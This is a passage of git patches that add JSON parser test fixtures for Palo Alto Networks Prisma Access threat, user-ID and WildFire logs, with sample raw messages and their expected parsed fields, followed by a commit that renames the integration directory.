PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= requestMethod=post PanOSIMSI=1 PanOSIMEI=Navy Base PanOSParentSessionID=8802 PanOSParentStarttime=Mar 01 2021 20:48:10 PanOSTunnel=VXLAN PanOSInlineMLVerdict=overflow PanOSContentVersion=50222 PanOSSigFlags=2 PanOSHTTPHeaders= PanOSURLCategoryList=sports,\u200b11008,\u200b38340 PanOSRuleUUID=ec14df0b-c845-4435-87a2-d207730f5ae8 PanOSHTTP2Connection=8802 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=L-Phone PanOSSourceDeviceProfile=l-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=L-Phone PanOSDestinationDeviceProfile=l-profile PanOSDestinationDeviceModel=Note XT PanOSDestinationDeviceVendor=Lenovo PanOSDestinationDeviceOSFamily=K8 PanOSDestinationDeviceOSVersion=Android v8 PanOSDestinationDeviceHost=pan-506 PanOSDestinationDeviceMac=150083646537 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= blue_dag PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=b5",
+    "event": {
+      "action": "block-url",
+      "category": [
+        "network"
+      ],
+      "dataset": "threat",
+      "severity": 1,
+      "start": "2021-03-01T20:48:16Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T20:48:21Z",
+    "action": {
+      "type": "url"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "geo": {
+        "country_iso_code": "PK"
+      },
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 12016
+      },
+      "port": 1532,
+      "user": {
+        "name": "xxxxx o\"'\"test"
+      }
+    },
+    "host": {
+      "hostname": "xxxxx",
+      "id": "xxxxxxxxxxxxx",
+      "mac": "596703749274",
+      "name": "xxxxx",
+      "os": {
+        "family": "K6",
+        "version": "Android v9"
+      },
+      "type": "L-Phone"
+    },
+    "log": {
+      "hostname": "xxxxx",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "maxdb",
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrust",
+          "id": "2",
+          "name": "ethernet1/2"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "ethernet4Zone-test4",
+          "id": "2",
+          "name": "n"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "DirectionOfAttack": "server to client",
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "L-Phone",
+      "PanOSDestinationDeviceHost": "pan-506",
+      "PanOSDestinationDeviceMac": "150083646537",
+      "PanOSDestinationDeviceModel": "Note XT",
+      "PanOSDestinationDeviceOSFamily": "K8",
+      "PanOSDestinationDeviceOSVersion": "Android v8",
+      "PanOSDestinationDeviceProfile": "l-profile",
+      "PanOSDestinationDeviceVendor": "Lenovo",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "l-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceDynamicAddressGroup": "blue_dag",
+      "PanOSSourceLocation": "west-coast",
+      "URLCategory": "sports",
+      "VirtualLocation": "vsys1",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxxxxx"
+      }
+    },
+    "related": {
+      "hosts": [
+        "xxxxx"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx o\"'\"test",
+        "xxxxx xxxxx"
+      ]
+    },
+    "rule": {
+      "name": "allow-business-apps",
+      "uuid": "ec14df0b-c845-4435-87a2-d207730f5ae8"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 26236
+      },
+      "port": 32350,
+      "user": {
+        "name": "xxxxx xxxxx"
+      }
+    },
+    "user": {
+      "name": "xxxxx xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json
new file mode 100644
index 000000000..c90ab6ed6
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json	
@@ -0,0 +1,77 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|USERID|logout|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:02 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= dntdom=paloaltonetwork duser=xxxxx duid= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsDuplicateUser= PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSUserGroupFound= start=Mar 01 2021 21:06:02 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 duser0=paloaltonetworks\\\\xxxxx cs4=fake-data-source-169 cs4Label=MappingDataSourceName cat=0 cnt=1 cn3=3531 cn3Label=MappingTimeout spt=21015 dpt=49760 cs5=probing cs5Label=MappingDataSource cs6=netbios_probing cs6Label=MappingDataSourceType externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID cs1=xxxxx cs1Label=MFAFactorType end=Jul 09 2019 18:15:44 cn1=3 cn1Label=AuthFactorNo PanOSUGFlags=0x100 PanOSUserIdentifiedBySource=xxxxxxxxxxxxxx PanOSTag= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|USERID|logout|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:02 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= dntdom=paloaltonetwork duser=xxxxx duid= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsDuplicateUser= PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSUserGroupFound= start=Mar 01 2021 21:06:02 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 duser0=paloaltonetworks\\\\xxxxx cs4=fake-data-source-169 cs4Label=MappingDataSourceName cat=0 cnt=1 cn3=3531 cn3Label=MappingTimeout spt=21015 dpt=49760 cs5=probing cs5Label=MappingDataSource cs6=netbios_probing cs6Label=MappingDataSourceType externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID cs1=xxxxx cs1Label=MFAFactorType end=Jul 09 2019 18:15:44 cn1=3 cn1Label=AuthFactorNo PanOSUGFlags=0x100 PanOSUserIdentifiedBySource=xxxxxxxxxxxxxx PanOSTag= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "userid",
+      "severity": 3,
+      "start": "2021-03-01T21:06:02Z",
+      "timezone": "UTC",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2021-03-01T21:06:02Z",
+    "action": {
+      "type": "logout"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 49760,
+      "user": {
+        "name": "xxxxx"
+      }
+    },
+    "host": {
+      "hostname": "PA-5220",
+      "id": "xxxxxxxxxxxxx",
+      "name": "PA-5220"
+    },
+    "log": {
+      "hostname": "PA-5220",
+      "logger": "userid"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "probing"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "fake-data-source-169"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
+    "related": {
+      "hosts": [
+        "PA-5220"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 21015
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json
new file mode 100644
index 000000000..edd76521b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json	
@@ -0,0 +1,111 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n"
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n",
+    "event": {
+      "action": "block",
+      "category": [
+        "malware"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-05-30T06:52:13Z",
+    "action": {
+      "name": "block",
+      "outcome": "success",
+      "type": "wildfire"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "geo": {
+        "country_iso_code": "CN"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 80
+      },
+      "port": 80
+    },
+    "file": {
+      "name": "mp3.exe"
+    },
+    "log": {
+      "hostname": "MyDevice",
+      "level": "Informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "Untrust"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "Trust"
+        }
+      },
+      "name": "MyDevice",
+      "product": "PAN-OS",
+      "serial_number": "111111111111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "738",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "server to client",
+      "Threat_ContentType": "wildfire",
+      "VirtualLocation": "vsys1",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxx"
+      },
+      "threat": {
+        "id": "Windows Executable (EXE)(52020)"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "example.org",
+        "john.doe@example.org"
+      ]
+    },
+    "rule": {
+      "name": "Normal Internet Access browser",
+      "uuid": "50afdf91-0d37-4729-8052-1382912d9895"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 40114
+      },
+      "port": 55555,
+      "user": {
+        "name": "john.doe@example.org"
+      }
+    },
+    "user": {
+      "domain": "john.doe",
+      "email": "john.doe@example.org",
+      "name": "example.org"
+    }
+  }
+}
\ No newline at end of file

From fd4ff900b367b4041ccf800d643be8e56e755b75 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 16 Oct 2024 11:06:29 +0200
Subject: [PATCH 154/317] fix(PaloAlto): fix directory name

---
 .../CHANGELOG.md                                    |   0
 .../README.md                                       |   0
 .../_meta/fields.yml                                |   0
 .../_meta/logo.png                                  | Bin
 .../_meta/manifest.yml                              |   0
 .../_meta/smart-descriptions.json                   |   0
 .../ingest/parser.yml                               |   0
 .../tests/User_id_1_csv.json                        |   0
 .../tests/User_id_2_csv.json                        |   0
 .../tests/auth_cef.json                             |   0
 .../tests/decryption_cef.json                       |   0
 .../tests/file_cef.json                             |   0
 .../tests/fix_bug_with_int.json                     |   0
 .../tests/fix_bug_without_int.json                  |   0
 .../tests/globalprotect_cef.json                    |   0
 .../tests/globalprotect_csv.json                    |   0
 .../tests/globalprotect_csv_2.json                  |   0
 .../tests/hip_match_cef.json                        |   0
 .../tests/icmp_allow_csv.json                       |   0
 .../tests/iptag_cef.json                            |   0
 .../tests/network_threat_alert_1.json               |   0
 .../tests/network_threat_alert_2.json               |   0
 .../tests/sctp_cef.json                             |   0
 .../tests/system_csv.json                           |   0
 .../tests/tcp_allow_csv.json                        |   0
 .../tests/test_cloud_election_json.json             |   0
 .../tests/test_dhcp_renew_json.json                 |   0
 .../tests/test_dns_proxy_json.json                  |   0
 .../tests/test_dns_response.json                    |   0
 .../tests/test_file_alert_json.json                 |   0
 .../tests/test_globalprotect.json                   |   0
 .../tests/test_installed_package_json.json          |   0
 .../tests/test_ldap_brute_force.json                |   0
 .../tests/test_new_file_type.json                   |   0
 .../tests/test_new_globalprotect.json               |   0
 .../tests/test_new_threat_type.json                 |   0
 .../tests/test_new_url_type.json                    |   0
 .../tests/test_ntp_sync_json.json                   |   0
 .../tests/test_port_up_json.json                    |   0
 .../tests/test_registration_succeed_json.json       |   0
 .../tests/test_system.json                          |   0
 .../tests/test_system_event_10_json.json            |   0
 .../tests/test_system_event_11_json.json            |   0
 .../tests/test_system_event_12_json.json            |   0
 .../tests/test_system_event_1_json.json             |   0
 .../tests/test_system_event_2_json.json             |   0
 .../tests/test_system_event_3_json.json             |   0
 .../tests/test_system_event_4_json.json             |   0
 .../tests/test_system_event_5_json.json             |   0
 .../tests/test_system_event_6_json.json             |   0
 .../tests/test_system_event_7_json.json             |   0
 .../tests/test_system_event_8_json.json             |   0
 .../tests/test_system_event_9_json.json             |   0
 .../tests/test_threat.json                          |   0
 .../tests/test_threat_02.json                       |   0
 .../tests/test_timestamp_palo.json                  |   0
 .../tests/test_traffic_event_1_json.json            |   0
 .../tests/test_traffic_event_2_json.json            |   0
 .../tests/test_update_content_json.json             |   0
 .../tests/test_upgrade_package_json.json            |   0
 .../tests/test_user_authentication_json.json        |   0
 .../tests/test_userid.json                          |   0
 .../tests/test_web_authentication_json.json         |   0
 .../tests/test_wildfire_failure_json.json           |   0
 .../tests/threat-url-xff.json                       |   0
 .../tests/threat_cef.json                           |   0
 .../tests/threat_csv.json                           |   0
 .../tests/traffic1_csv.json                         |   0
 .../tests/traffic2_csv.json                         |   0
 .../tests/traffic_cef.json                          |   0
 .../tests/traffic_with_resotimestamp.json           |   0
 .../tests/udp_deny_csv.json                         |   0
 .../tests/url_cef.json                              |   0
 .../tests/userid_cef.json                           |   0
 .../tests/wildfire1_json.json                       |   0
 75 files changed, 0 insertions(+), 0 deletions(-)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/CHANGELOG.md (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/README.md (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/fields.yml (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/logo.png (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/manifest.yml (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/smart-descriptions.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/ingest/parser.yml (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/User_id_1_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/User_id_2_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/auth_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/decryption_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/file_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/fix_bug_with_int.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/fix_bug_without_int.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_csv_2.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/hip_match_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/icmp_allow_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/iptag_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/network_threat_alert_1.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/network_threat_alert_2.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/sctp_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/system_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/tcp_allow_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_cloud_election_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dhcp_renew_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dns_proxy_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dns_response.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_file_alert_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_globalprotect.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_installed_package_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_ldap_brute_force.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_file_type.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_globalprotect.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_threat_type.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_url_type.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_ntp_sync_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_port_up_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_registration_succeed_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_10_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_11_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_12_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_1_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_2_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_3_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_4_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_5_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_6_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_7_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_8_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_9_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_threat.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_threat_02.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_timestamp_palo.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_traffic_event_1_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_traffic_event_2_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_update_content_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_upgrade_package_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_user_authentication_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_userid.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_web_authentication_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_wildfire_failure_json.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat-url-xff.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic1_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic2_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic_with_resotimestamp.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/udp_deny_csv.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/url_cef.json (100%)
